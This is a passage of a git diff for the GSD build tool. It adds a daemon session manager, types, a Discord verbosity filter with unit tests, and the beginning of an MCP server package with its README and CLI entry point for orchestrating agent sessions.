+   * Resolve a pending blocker by sending a UI response.
+   */
+  async resolveBlocker(sessionId: string, response: string): Promise<void> {
+    const session = this.getSession(sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+    if (!session.pendingBlocker) throw new Error(`No pending blocker for session ${sessionId}`);
+
+    const blocker = session.pendingBlocker;
+    session.client.sendUIResponse(blocker.id, { value: response });
+    session.pendingBlocker = null;
+    if (session.status === 'blocked') {
+      session.status = 'running';
+    }
+
+    this.logger.info('blocker resolved', {
+      sessionId,
+      projectDir: session.projectDir,
+      blockerId: blocker.id,
+      blockerMethod: blocker.method,
+    });
+  }
+
+  /**
+   * Cancel a running session — abort current operation then stop the process.
+   */
+  async cancelSession(sessionId: string): Promise<void> {
+    const session = this.getSession(sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+
+    try {
+      await session.client.abort();
+    } catch { /* may already be stopped */ }
+
+    try {
+      await session.client.stop();
+    } catch { /* swallow */ }
+
+    session.status = 'cancelled';
+    session.unsubscribe?.();
+
+    this.logger.info('session cancelled', { sessionId, projectDir: session.projectDir });
+  }
+
+  /**
+   * Build a HeadlessJsonResult-shaped object from accumulated session state.
+   */
+  getResult(sessionId: string): Record<string, unknown> {
+    const session = this.getSession(sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+
+    const durationMs = Date.now() - session.startTime;
+
+    return {
+      sessionId: session.sessionId,
+      projectDir: session.projectDir,
+      projectName: session.projectName,
+      status: session.status,
+      durationMs,
+      cost: session.cost,
+      recentEvents: session.events.slice(-10),
+      pendingBlocker: session.pendingBlocker
+        ? { id: session.pendingBlocker.id, method: session.pendingBlocker.method, message: session.pendingBlocker.message }
+        : null,
+      error: session.error ?? null,
+    };
+  }
+
+  /**
+   * Stop all active sessions and clean up resources.
+   */
+  async cleanup(): Promise<void> {
+    const stopPromises: Promise<void>[] = [];
+
+    for (const session of this.sessions.values()) {
+      session.unsubscribe?.();
+      if (session.status === 'running' || session.status === 'starting' || session.status === 'blocked') {
+        stopPromises.push(
+          session.client.stop().catch(() => { /* swallow */ })
+        );
+        session.status = 'cancelled';
+      }
+    }
+
+    await Promise.allSettled(stopPromises);
+  }
+
+  /**
+   * Resolve the GSD CLI path.
+   *
+   * 1. GSD_CLI_PATH env var (highest priority)
+   * 2. `which gsd` → resolve to the actual dist/cli.js
+   */
+  static resolveCLIPath(): string {
+    const envPath = process.env['GSD_CLI_PATH'];
+    if (envPath) return resolve(envPath);
+
+    try {
+      const gsdBin = execSync('which gsd', { encoding: 'utf-8' }).trim();
+      if (gsdBin) return resolve(gsdBin);
+    } catch {
+      // which failed
+    }
+
+    throw new Error(
+      'Cannot find GSD CLI. Set GSD_CLI_PATH environment variable or ensure `gsd` is in PATH.'
+    );
+  }
+
+  // ---------------------------------------------------------------------------
+  // Private: Event Handling
+  // ---------------------------------------------------------------------------
+
+  private handleEvent(session: ManagedSession, event: SdkAgentEvent): void {
+    // Ring buffer: push and trim
+    session.events.push(event);
+    if (session.events.length > MAX_EVENTS) {
+      session.events.splice(0, session.events.length - MAX_EVENTS);
+    }
+
+    // Forward event to listeners
+    this.logger.debug('session event', { sessionId: session.sessionId, type: (event as Record<string, unknown>).type as string });
+    this.emit('session:event', { sessionId: session.sessionId, projectDir: session.projectDir, event });
+
+    // Cost tracking (K004 — cumulative-max)
+    if ((event as Record<string, unknown>).type === 'cost_update') {
+      const costEvent = event as unknown as RpcCostUpdateEvent;
+      session.cost.totalCost = Math.max(session.cost.totalCost, costEvent.cumulativeCost ?? 0);
+      if (costEvent.tokens) {
+        session.cost.tokens.input = Math.max(session.cost.tokens.input, costEvent.tokens.input ?? 0);
+        session.cost.tokens.output = Math.max(session.cost.tokens.output, costEvent.tokens.output ?? 0);
+        session.cost.tokens.cacheRead = Math.max(session.cost.tokens.cacheRead, costEvent.tokens.cacheRead ?? 0);
+        session.cost.tokens.cacheWrite = Math.max(session.cost.tokens.cacheWrite, costEvent.tokens.cacheWrite ?? 0);
+      }
+    }
+
+    // Terminal detection — auto-mode/step-mode stopped
+    if (isTerminalNotification(event as Record<string, unknown>)) {
+      if (isBlockedNotification(event as Record<string, unknown>)) {
+        session.status = 'blocked';
+        session.pendingBlocker = extractBlocker(event);
+        this.logger.info('session blocked', {
+          sessionId: session.sessionId,
+          projectDir: session.projectDir,
+          blockerId: session.pendingBlocker.id,
+          blockerMethod: session.pendingBlocker.method,
+        });
+        this.emit('session:blocked', {
+          sessionId: session.sessionId,
+          projectDir: session.projectDir,
+          projectName: session.projectName,
+          blocker: session.pendingBlocker,
+        });
+      } else {
+        session.status = 'completed';
+        session.unsubscribe?.();
+        this.logger.info('session completed', { sessionId: session.sessionId, projectDir: session.projectDir });
+        this.emit('session:completed', {
+          sessionId: session.sessionId,
+          projectDir: session.projectDir,
+          projectName: session.projectName,
+        });
+      }
+      return;
+    }
+
+    // Blocker detection — non-fire-and-forget extension_ui_request
+    if (isBlockingUIRequest(event as Record<string, unknown>)) {
+      session.status = 'blocked';
+      session.pendingBlocker = extractBlocker(event);
+      this.logger.info('session blocked', {
+        sessionId: session.sessionId,
+        projectDir: session.projectDir,
+        blockerId: session.pendingBlocker.id,
+        blockerMethod: session.pendingBlocker.method,
+      });
+      this.emit('session:blocked', {
+        sessionId: session.sessionId,
+        projectDir: session.projectDir,
+        projectName: session.projectName,
+        blocker: session.pendingBlocker,
+      });
+    }
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+function timeout(ms: number, message: string): Promise<never> {
+  return new Promise((_, reject) => {
+    setTimeout(() => reject(new Error(message)), ms);
+  });
+}
+
+function extractBlocker(event: SdkAgentEvent): PendingBlocker {
+  const uiEvent = event as unknown as RpcExtensionUIRequest;
+  return {
+    id: String(uiEvent.id ?? ''),
+    method: String(uiEvent.method ?? ''),
+    message: String((uiEvent as Record<string, unknown>).title ?? (uiEvent as Record<string, unknown>).message ?? ''),
+    event: uiEvent,
+  };
+}
diff --git a/packages/daemon/src/types.ts b/packages/daemon/src/types.ts
new file mode 100644
index 000000000..822d1ff9b
--- /dev/null
+++ b/packages/daemon/src/types.ts
@@ -0,0 +1,199 @@
+import type { RpcClient, SdkAgentEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client';
+
+/**
+ * Log severity levels, ordered from most to least verbose.
+ */
+export type LogLevel = 'debug' | 'info' | 'warn' | 'error';
+
+/**
+ * Per-channel verbosity for Discord event streaming.
+ * - 'default': tool calls, messages, transitions, blockers, errors, completions
+ * - 'verbose': everything including cost_update and status events
+ * - 'quiet': only blockers, errors, completions
+ */
+export type VerbosityLevel = 'default' | 'verbose' | 'quiet';
+
+/**
+ * A single structured log entry written as JSON-lines.
+ */
+export interface LogEntry {
+  /** ISO-8601 timestamp */
+  ts: string;
+  level: LogLevel;
+  msg: string;
+  data?: Record<string, unknown>;
+}
+
+/**
+ * Top-level daemon configuration, loaded from YAML.
+ */
+export interface DaemonConfig {
+  discord?: {
+    token: string;
+    guild_id: string;
+    owner_id: string;
+    /** When true, DM the owner on blocker events in addition to channel messages */
+    dm_on_blocker?: boolean;
+    /** Discord channel ID where the orchestrator listens for natural language commands */
+    control_channel_id?: string;
+    /** LLM orchestrator settings */
+    orchestrator?: {
+      model?: string;
+      max_tokens?: number;
+    };
+  };
+  projects: {
+    scan_roots: string[];
+  };
+  log: {
+    file: string;
+    level: LogLevel;
+    max_size_mb: number;
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Session Status
+// ---------------------------------------------------------------------------
+
+export type SessionStatus = 'starting' | 'running' | 'blocked' | 'completed' | 'error' | 'cancelled';
+
+// ---------------------------------------------------------------------------
+// Managed Session
+// ---------------------------------------------------------------------------
+
+/**
+ * A daemon-managed GSD headless session.
+ */
+export interface ManagedSession {
+  /** Unique session ID returned from RpcClient.init() */
+  sessionId: string;
+
+  /** Absolute path to the project directory */
+  projectDir: string;
+
+  /** Human-readable project name (basename of projectDir) */
+  projectName: string;
+
+  /** Current lifecycle status */
+  status: SessionStatus;
+
+  /** The RpcClient instance managing the agent process */
+  client: RpcClient;
+
+  /** Ring buffer of recent events (capped at MAX_EVENTS) */
+  events: SdkAgentEvent[];
+
+  /** Pending blocker requiring user response, if any */
+  pendingBlocker: PendingBlocker | null;
+
+  /** Cumulative cost tracking (max pattern per K004) */
+  cost: CostAccumulator;
+
+  /** Session start timestamp */
+  startTime: number;
+
+  /** Error message if status is 'error' */
+  error?: string;
+
+  /** Cleanup function to unsubscribe from events */
+  unsubscribe?: () => void;
+}
+
+// ---------------------------------------------------------------------------
+// Pending Blocker
+// ---------------------------------------------------------------------------
+
+export interface PendingBlocker {
+  /** The extension_ui_request id */
+  id: string;
+
+  /** The request method (e.g. 'select', 'confirm', 'input') */
+  method: string;
+
+  /** Human-readable message or title */
+  message: string;
+
+  /** Full event payload for inspection */
+  event: RpcExtensionUIRequest;
+}
+
+// ---------------------------------------------------------------------------
+// Cost Accumulator (K004 — cumulative-max)
+// ---------------------------------------------------------------------------
+
+export interface CostAccumulator {
+  totalCost: number;
+  tokens: {
+    input: number;
+    output: number;
+    cacheRead: number;
+    cacheWrite: number;
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Project Info — scanner output
+// ---------------------------------------------------------------------------
+
+/** Marker types detectable by the project scanner */
+export type ProjectMarker = 'git' | 'node' | 'gsd' | 'rust' | 'python' | 'go';
+
+export interface ProjectInfo {
+  /** Directory name (basename) */
+  name: string;
+
+  /** Absolute path to the project directory */
+  path: string;
+
+  /** Detected marker types */
+  markers: ProjectMarker[];
+
+  /** Most recent mtime of detected marker files/dirs (epoch ms) */
+  lastModified: number;
+}
+
+// ---------------------------------------------------------------------------
+// Start Session Options
+// ---------------------------------------------------------------------------
+
+export interface StartSessionOptions {
+  /** Absolute path to the project directory */
+  projectDir: string;
+
+  /** Command to send after '/gsd auto' (default: none) */
+  command?: string;
+
+  /** Model ID override */
+  model?: string;
+
+  /** Run in bare mode (skip user config) */
+  bare?: boolean;
+
+  /** Path to CLI binary (overrides GSD_CLI_PATH and which resolution) */
+  cliPath?: string;
+}
+
+// ---------------------------------------------------------------------------
+// Formatted Event — output of event-formatter.ts
+// ---------------------------------------------------------------------------
+
+/**
+ * Formatted Discord message payload for a GSD event.
+ * content is the plain-text fallback; embeds and components are optional.
+ */
+export interface FormattedEvent {
+  content: string;
+  embed?: import('discord.js').EmbedBuilder;
+  components?: import('discord.js').ActionRowBuilder<import('discord.js').ButtonBuilder>[];
+}
+
+// ---------------------------------------------------------------------------
+// Constants
+// ---------------------------------------------------------------------------
+
+/** Maximum number of events kept in the ring buffer (larger than mcp-server's 50 — daemon forwards events to Discord) */
+export const MAX_EVENTS = 100;
+
+/** Timeout for RpcClient initialization (ms) */
+export const INIT_TIMEOUT_MS = 30_000;
diff --git a/packages/daemon/src/verbosity.test.ts b/packages/daemon/src/verbosity.test.ts
new file mode 100644
index 000000000..42c61e9b6
--- /dev/null
+++ b/packages/daemon/src/verbosity.test.ts
@@ -0,0 +1,171 @@
+import { describe, it, beforeEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { VerbosityManager, shouldShowAtLevel } from './verbosity.js';
+
+// ---------------------------------------------------------------------------
+// VerbosityManager
+// ---------------------------------------------------------------------------
+
+describe('VerbosityManager', () => {
+  let vm: VerbosityManager;
+
+  beforeEach(() => {
+    vm = new VerbosityManager();
+  });
+
+  it('returns default level for unknown channel', () => {
+    assert.equal(vm.getLevel('chan-1'), 'default');
+  });
+
+  it('set/get round-trips', () => {
+    vm.setLevel('chan-1', 'quiet');
+    assert.equal(vm.getLevel('chan-1'), 'quiet');
+    vm.setLevel('chan-1', 'verbose');
+    assert.equal(vm.getLevel('chan-1'), 'verbose');
+  });
+
+  it('different channels are independent', () => {
+    vm.setLevel('chan-a', 'quiet');
+    vm.setLevel('chan-b', 'verbose');
+    assert.equal(vm.getLevel('chan-a'), 'quiet');
+    assert.equal(vm.getLevel('chan-b'), 'verbose');
+    assert.equal(vm.getLevel('chan-c'), 'default');
+  });
+
+  it('shouldShow delegates to the level-based filter', () => {
+    vm.setLevel('chan-q', 'quiet');
+    assert.equal(vm.shouldShow('chan-q', 'tool_execution_start'), false);
+    assert.equal(vm.shouldShow('chan-q', 'extension_ui_request'), true);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// shouldShowAtLevel — quiet
+// ---------------------------------------------------------------------------
+
+describe('shouldShowAtLevel — quiet', () => {
+  const level = 'quiet' as const;
+
+  it('shows blockers', () => {
+    assert.equal(shouldShowAtLevel(level, 'extension_ui_request'), true);
+  });
+
+  it('shows execution_complete', () => {
+    assert.equal(shouldShowAtLevel(level, 'execution_complete'), true);
+  });
+
+  it('shows error', () => {
+    assert.equal(shouldShowAtLevel(level, 'error'), true);
+  });
+
+  it('shows session_error', () => {
+    assert.equal(shouldShowAtLevel(level, 'session_error'), true);
+  });
+
+  it('hides tool calls', () => {
+    assert.equal(shouldShowAtLevel(level, 'tool_execution_start'), false);
+    assert.equal(shouldShowAtLevel(level, 'tool_execution_end'), false);
+  });
+
+  it('hides messages', () => {
+    assert.equal(shouldShowAtLevel(level, 'message_start'), false);
+    assert.equal(shouldShowAtLevel(level, 'message'), false);
+  });
+
+  it('hides cost_update', () => {
+    assert.equal(shouldShowAtLevel(level, 'cost_update'), false);
+  });
+
+  it('hides task_transition', () => {
+    assert.equal(shouldShowAtLevel(level, 'task_transition'), false);
+  });
+
+  it('hides unknown events', () => {
+    assert.equal(shouldShowAtLevel(level, 'totally_random'), false);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// shouldShowAtLevel — default
+// ---------------------------------------------------------------------------
+
+describe('shouldShowAtLevel — default', () => {
+  const level = 'default' as const;
+
+  it('shows blockers', () => {
+    assert.equal(shouldShowAtLevel(level, 'extension_ui_request'), true);
+  });
+
+  it('shows execution_complete', () => {
+    assert.equal(shouldShowAtLevel(level, 'execution_complete'), true);
+  });
+
+  it('shows error', () => {
+    assert.equal(shouldShowAtLevel(level, 'error'), true);
+  });
+
+  it('shows tool calls', () => {
+    assert.equal(shouldShowAtLevel(level, 'tool_execution_start'), true);
+    assert.equal(shouldShowAtLevel(level, 'tool_execution_end'), true);
+  });
+
+  it('shows messages', () => {
+    assert.equal(shouldShowAtLevel(level, 'message_start'), true);
+    assert.equal(shouldShowAtLevel(level, 'message_end'), true);
+    assert.equal(shouldShowAtLevel(level, 'message'), true);
+  });
+
+  it('shows task_transition', () => {
+    assert.equal(shouldShowAtLevel(level, 'task_transition'), true);
+  });
+
+  it('shows session_started', () => {
+    assert.equal(shouldShowAtLevel(level, 'session_started'), true);
+  });
+
+  it('hides cost_update', () => {
+    assert.equal(shouldShowAtLevel(level, 'cost_update'), false);
+  });
+
+  it('hides status events', () => {
+    assert.equal(shouldShowAtLevel(level, 'state_update'), false);
+    assert.equal(shouldShowAtLevel(level, 'status'), false);
+  });
+
+  it('hides unknown events', () => {
+    assert.equal(shouldShowAtLevel(level, 'something_weird'), false);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// shouldShowAtLevel — verbose
+// ---------------------------------------------------------------------------
+
+describe('shouldShowAtLevel — verbose', () => {
+  const level = 'verbose' as const;
+
+  it('shows everything that quiet/default show', () => {
+    const events = [
+      'extension_ui_request', 'execution_complete', 'error', 'session_error',
+      'tool_execution_start', 'tool_execution_end', 'message_start', 'message_end',
+      'message', 'task_transition', 'session_started',
+    ];
+    for (const e of events) {
+      assert.equal(shouldShowAtLevel(level, e), true, `Expected verbose to show ${e}`);
+    }
+  });
+
+  it('shows cost_update', () => {
+    assert.equal(shouldShowAtLevel(level, 'cost_update'), true);
+  });
+
+  it('shows status events', () => {
+    assert.equal(shouldShowAtLevel(level, 'state_update'), true);
+    assert.equal(shouldShowAtLevel(level, 'status'), true);
+    assert.equal(shouldShowAtLevel(level, 'set_status'), true);
+  });
+
+  it('shows unknown/arbitrary events', () => {
+    assert.equal(shouldShowAtLevel(level, 'something_arbitrary'), true);
+  });
+});
diff --git a/packages/daemon/src/verbosity.ts b/packages/daemon/src/verbosity.ts
new file mode 100644
index 000000000..e40b11c87
--- /dev/null
+++ b/packages/daemon/src/verbosity.ts
@@ -0,0 +1,101 @@
+/**
+ * verbosity.ts — Per-channel verbosity filter for Discord event streaming.
+ *
+ * Controls which RPC event types reach each Discord channel.
+ * Three levels:
+ *   - 'quiet':   blockers, errors, completions only
+ *   - 'default': tool calls, messages, transitions, blockers, errors, completions
+ *   - 'verbose': everything (adds cost_update, status, generic events)
+ */
+
+import type { VerbosityLevel } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Event classification
+// ---------------------------------------------------------------------------
+
+/** Event types that are always shown (even in quiet mode). */
+const ALWAYS_SHOWN: ReadonlySet<string> = new Set([
+  'extension_ui_request',  // blockers
+  'execution_complete',
+  'error',
+  'session_error',
+]);
+
+/** Event types shown at default level and above. */
+const DEFAULT_SHOWN: ReadonlySet<string> = new Set([
+  'tool_execution_start',
+  'tool_execution_end',
+  'message_start',
+  'message_end',
+  'message',
+  'task_transition',
+  'session_started',
+]);
+
+/** Event types shown only at verbose level. */
+const VERBOSE_ONLY: ReadonlySet<string> = new Set([
+  'cost_update',
+  'state_update',
+  'status',
+  'set_status',
+  'set_widget',
+  'set_title',
+]);
+
+// ---------------------------------------------------------------------------
+// VerbosityManager
+// ---------------------------------------------------------------------------
+
+export class VerbosityManager {
+  private levels: Map<string, VerbosityLevel> = new Map();
+
+  /** Get the verbosity level for a channel. Defaults to 'default'. */
+  getLevel(channelId: string): VerbosityLevel {
+    return this.levels.get(channelId) ?? 'default';
+  }
+
+  /** Set the verbosity level for a channel. */
+  setLevel(channelId: string, level: VerbosityLevel): void {
+    this.levels.set(channelId, level);
+  }
+
+  /**
+   * Determine whether an event of the given type should be shown
+   * in the specified channel.
+   */
+  shouldShow(channelId: string, eventType: string): boolean {
+    const level = this.getLevel(channelId);
+    return shouldShowAtLevel(level, eventType);
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Pure filter — exported for direct use and testability
+// ---------------------------------------------------------------------------
+
+/**
+ * Pure predicate: should an event of this type be shown at the given verbosity level?
+ */
+export function shouldShowAtLevel(level: VerbosityLevel, eventType: string): boolean {
+  // Always-shown events pass through regardless of level
+  if (ALWAYS_SHOWN.has(eventType)) return true;
+
+  switch (level) {
+    case 'quiet':
+      // Quiet only shows ALWAYS_SHOWN events
+      return false;
+
+    case 'default':
+      // Default shows ALWAYS_SHOWN + DEFAULT_SHOWN
+      return DEFAULT_SHOWN.has(eventType);
+
+    case 'verbose':
+      // Verbose shows everything
+      return true;
+
+    default:
+      // Unknown level → treat as default
+      return DEFAULT_SHOWN.has(eventType);
+  }
+}
diff --git a/packages/daemon/tsconfig.json b/packages/daemon/tsconfig.json
new file mode 100644
index 000000000..779b48aca
--- /dev/null
+++ b/packages/daemon/tsconfig.json
@@ -0,0 +1,24 @@
+{
+  "compilerOptions": {
+    "target": "ES2024",
+    "module": "Node16",
+    "lib": ["ES2024"],
+    "strict": true,
+    "esModuleInterop": true,
+    "skipLibCheck": true,
+    "forceConsistentCasingInFileNames": true,
+    "declaration": true,
+    "declarationMap": true,
+    "sourceMap": true,
+    "inlineSources": true,
+    "inlineSourceMap": false,
+    "moduleResolution": "Node16",
+    "resolveJsonModule": true,
+    "allowImportingTsExtensions": false,
+    "types": ["node"],
+    "outDir": "./dist",
+    "rootDir": "./src"
+  },
+  "include": ["src/**/*.ts"],
+  "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"]
+}
diff --git a/packages/mcp-server/.npmignore b/packages/mcp-server/.npmignore
new file mode 100644
index 000000000..5aedf8f6e
--- /dev/null
+++ b/packages/mcp-server/.npmignore
@@ -0,0 +1 @@
+dist/*.test.*
diff --git a/packages/mcp-server/README.md b/packages/mcp-server/README.md
new file mode 100644
index 000000000..fd4783ea9
--- /dev/null
+++ b/packages/mcp-server/README.md
@@ -0,0 +1,202 @@
+# @gsd-build/mcp-server
+
+MCP server exposing GSD orchestration tools for Claude Code, Cursor, and other MCP-compatible clients.
+
+Start GSD auto-mode sessions, poll progress, resolve blockers, and retrieve results — all through the [Model Context Protocol](https://modelcontextprotocol.io/).
+
+## Installation
+
+```bash
+npm install @gsd-build/mcp-server
+```
+
+Or with the monorepo workspace:
+
+```bash
+# Already available as a workspace package
+npx gsd-mcp-server
+```
+
+## Configuration
+
+### Claude Code
+
+Add to your project's `.mcp.json`:
+
+```json
+{
+  "mcpServers": {
+    "gsd": {
+      "command": "npx",
+      "args": ["gsd-mcp-server"],
+      "env": {
+        "GSD_CLI_PATH": "/path/to/gsd"
+      }
+    }
+  }
+}
+```
+
+Or if installed globally:
+
+```json
+{
+  "mcpServers": {
+    "gsd": {
+      "command": "gsd-mcp-server"
+    }
+  }
+}
+```
+
+### Cursor
+
+Add to `.cursor/mcp.json`:
+
+```json
+{
+  "mcpServers": {
+    "gsd": {
+      "command": "npx",
+      "args": ["gsd-mcp-server"],
+      "env": {
+        "GSD_CLI_PATH": "/path/to/gsd"
+      }
+    }
+  }
+}
+```
+
+## Tools
+
+### `gsd_execute`
+
+Start a GSD auto-mode session for a project directory.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `projectDir` | `string` | ✅ | Absolute path to the project directory |
+| `command` | `string` | | Command to send (default: `"/gsd auto"`) |
+| `model` | `string` | | Model ID override |
+| `bare` | `boolean` | | Run in bare mode (skip user config) |
+
+**Returns:** `{ sessionId, status: "started" }`
+
+### `gsd_status`
+
+Poll the current status of a running GSD session.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` |
+
+**Returns:**
+
+```json
+{
+  "status": "running",
+  "progress": { "eventCount": 42, "toolCalls": 15 },
+  "recentEvents": [ ... ],
+  "pendingBlocker": null,
+  "cost": { "totalCost": 0.12, "tokens": { "input": 5000, "output": 2000, "cacheRead": 1000, "cacheWrite": 500 } },
+  "durationMs": 45000
+}
+```
+
+### `gsd_result`
+
+Get the accumulated result of a session. Works for both running (partial) and completed sessions.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` |
+
+**Returns:**
+
+```json
+{
+  "sessionId": "abc-123",
+  "projectDir": "/path/to/project",
+  "status": "completed",
+  "durationMs": 120000,
+  "cost": { ... },
+  "recentEvents": [ ... ],
+  "pendingBlocker": null,
+  "error": null
+}
+```
+
+### `gsd_cancel`
+
+Cancel a running session. Aborts the current operation and stops the agent process.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` |
+
+**Returns:** `{ cancelled: true }`
+
+### `gsd_query`
+
+Query GSD project state from the filesystem without an active session. Returns STATE.md, PROJECT.md, requirements, and milestone listing.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `projectDir` | `string` | ✅ | Absolute path to the project directory |
+| `query` | `string` | ✅ | What to query (e.g. `"status"`, `"milestones"`) |
+
+**Returns:**
+
+```json
+{
+  "projectDir": "/path/to/project",
+  "state": "...",
+  "project": "...",
+  "requirements": "...",
+  "milestones": [
+    { "id": "M001", "hasRoadmap": true, "hasSummary": false }
+  ]
+}
+```
+
+### `gsd_resolve_blocker`
+
+Resolve a pending blocker in a session by sending a response to the blocked UI request.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `sessionId` | `string` | ✅ | Session ID from `gsd_execute` |
+| `response` | `string` | ✅ | Response to send for the pending blocker |
+
+**Returns:** `{ resolved: true }`
+
+## Environment Variables
+
+| Variable | Description |
+|----------|-------------|
+| `GSD_CLI_PATH` | Absolute path to the GSD CLI binary. If not set, the server resolves `gsd` via `which`. |
+
+## Architecture
+
+```
+┌─────────────────┐     stdio      ┌──────────────────┐
+│  MCP Client     │ ◄────────────► │  @gsd-build/mcp-server │
+│  (Claude Code,  │    JSON-RPC    │                  │
+│   Cursor, etc.) │                │  SessionManager  │
+└─────────────────┘                │       │          │
+                                   │       ▼          │
+                                   │  @gsd-build/rpc-client │
+                                   │       │          │
+                                   │       ▼          │
+                                   │  GSD CLI (child  │
+                                   │  process via RPC)│
+                                   └──────────────────┘
+```
+
+- **@gsd-build/mcp-server** — MCP protocol adapter. Translates MCP tool calls into SessionManager operations.
+- **SessionManager** — Manages RpcClient lifecycle. One session per project directory. Tracks events in a ring buffer (last 50), detects blockers, accumulates cost.
+- **@gsd-build/rpc-client** — Low-level RPC client that spawns and communicates with the GSD CLI process via JSON-RPC over stdio.
+
+## License
+
+MIT
diff --git a/packages/mcp-server/package.json b/packages/mcp-server/package.json
new file mode 100644
index 000000000..449a074de
--- /dev/null
+++ b/packages/mcp-server/package.json
@@ -0,0 +1,46 @@
+{
+  "name": "@gsd-build/mcp-server",
+  "version": "2.52.0",
+  "description": "MCP server exposing GSD orchestration tools for Claude Code, Cursor, and other MCP clients",
+  "license": "MIT",
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/gsd-build/gsd-2.git",
+    "directory": "packages/mcp-server"
+  },
+  "publishConfig": {
+    "access": "public"
+  },
+  "type": "module",
+  "main": "./dist/index.js",
+  "types": "./dist/index.d.ts",
+  "exports": {
+    ".": {
+      "types": "./dist/index.d.ts",
+      "import": "./dist/index.js"
+    }
+  },
+  "bin": {
+    "gsd-mcp-server": "./dist/cli.js"
+  },
+  "scripts": {
+    "build": "tsc",
+    "test": "node --test dist/mcp-server.test.js"
+  },
+  "dependencies": {
+    "@modelcontextprotocol/sdk": "^1.27.1",
+    "@gsd-build/rpc-client": "^2.52.0",
+    "zod": "^4.0.0"
+  },
+  "devDependencies": {
+    "@types/node": "^24.12.0",
+    "typescript": "^5.4.0"
+  },
+  "engines": {
+    "node": ">=22.0.0"
+  },
+  "files": [
+    "dist",
+    "!dist/**/*.test.*"
+  ]
+}
diff --git a/packages/mcp-server/src/cli.ts b/packages/mcp-server/src/cli.ts
new file mode 100644
index 000000000..744749d03
--- /dev/null
+++ b/packages/mcp-server/src/cli.ts
@@ -0,0 +1,68 @@
+#!/usr/bin/env node
+
+/**
+ * @gsd-build/mcp-server CLI — stdio transport entry point.
+ *
+ * Connects the MCP server to stdin/stdout for use by Claude Code,
+ * Cursor, and other MCP-compatible clients.
+ */
+
+import { SessionManager } from './session-manager.js';
+import { createMcpServer } from './server.js';
+
+const MCP_PKG = '@modelcontextprotocol/sdk';
+
+async function main(): Promise<void> {
+  const sessionManager = new SessionManager();
+
+  // Create the configured MCP server with all 12 tools (6 session + 6 read-only)
+  const { server } = await createMcpServer(sessionManager);
+
+  // Dynamic import for StdioServerTransport (same TS subpath workaround)
+  const { StdioServerTransport } = await import(`${MCP_PKG}/server/stdio.js`);
+  const transport = new StdioServerTransport();
+
+  // Cleanup handler — stop all sessions before exiting
+  let cleaningUp = false;
+  async function cleanup(): Promise<void> {
+    if (cleaningUp) return;
+    cleaningUp = true;
+    process.stderr.write('[gsd-mcp-server] Shutting down...\n');
+    try {
+      await sessionManager.cleanup();
+    } catch {
+      // swallow cleanup errors
+    }
+    try {
+      await server.close();
+    } catch {
+      // swallow close errors
+    }
+    process.exit(0);
+  }
+
+  process.on('SIGTERM', () => void cleanup());
+  process.on('SIGINT', () => void cleanup());
+
+  // Handle stdin end — MCP client disconnected
+  process.stdin.on('end', () => void cleanup());
+
+  // Connect and start serving
+  try {
+    await server.connect(transport);
+    process.stderr.write('[gsd-mcp-server] MCP server started on stdio\n');
+  } catch (err) {
+    process.stderr.write(
+      `[gsd-mcp-server] Fatal: failed to start — ${err instanceof Error ? err.message : String(err)}\n`
+    );
+    await sessionManager.cleanup();
+    process.exit(1);
+  }
+}
+
+main().catch((err) => {
+  process.stderr.write(
+    `[gsd-mcp-server] Fatal: ${err instanceof Error ? err.message : String(err)}\n`
+  );
+  process.exit(1);
+});
diff --git a/packages/mcp-server/src/index.ts b/packages/mcp-server/src/index.ts
new file mode 100644
index 000000000..c1b837305
--- /dev/null
+++ b/packages/mcp-server/src/index.ts
@@ -0,0 +1,28 @@
+/**
+ * @gsd-build/mcp-server — MCP server for GSD orchestration and project state.
+ */
+
+export { SessionManager } from './session-manager.js';
+export { createMcpServer } from './server.js';
+export type {
+  SessionStatus,
+  ManagedSession,
+  ExecuteOptions,
+  PendingBlocker,
+  CostAccumulator,
+} from './types.js';
+export { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js';
+
+// Read-only state readers (usable without a running session)
+export { readProgress } from './readers/state.js';
+export type { ProgressResult } from './readers/state.js';
+export { readRoadmap } from './readers/roadmap.js';
+export type { RoadmapResult, MilestoneInfo, SliceInfo, TaskInfo } from './readers/roadmap.js';
+export { readHistory } from './readers/metrics.js';
+export type { HistoryResult, MetricsUnit } from './readers/metrics.js';
+export { readCaptures } from './readers/captures.js';
+export type { CapturesResult, CaptureEntry } from './readers/captures.js';
+export { readKnowledge } from './readers/knowledge.js';
+export type { KnowledgeResult, KnowledgeEntry } from './readers/knowledge.js';
+export { runDoctorLite } from './readers/doctor-lite.js';
+export type { DoctorResult, DoctorIssue } from './readers/doctor-lite.js';
diff --git a/packages/mcp-server/src/mcp-server.test.ts b/packages/mcp-server/src/mcp-server.test.ts
new file mode 100644
index 000000000..6d7ce156e
--- /dev/null
+++ b/packages/mcp-server/src/mcp-server.test.ts
@@ -0,0 +1,628 @@
+/**
+ * @gsd-build/mcp-server — Integration and unit tests.
+ *
+ * Strategy: We cannot mock @gsd-build/rpc-client at the module level without
+ * --experimental-test-module-mocks. Instead we test by:
+ *
+ * 1. Subclassing SessionManager to inject a mock client factory
+ * 2. Testing event handling, state transitions, and error paths
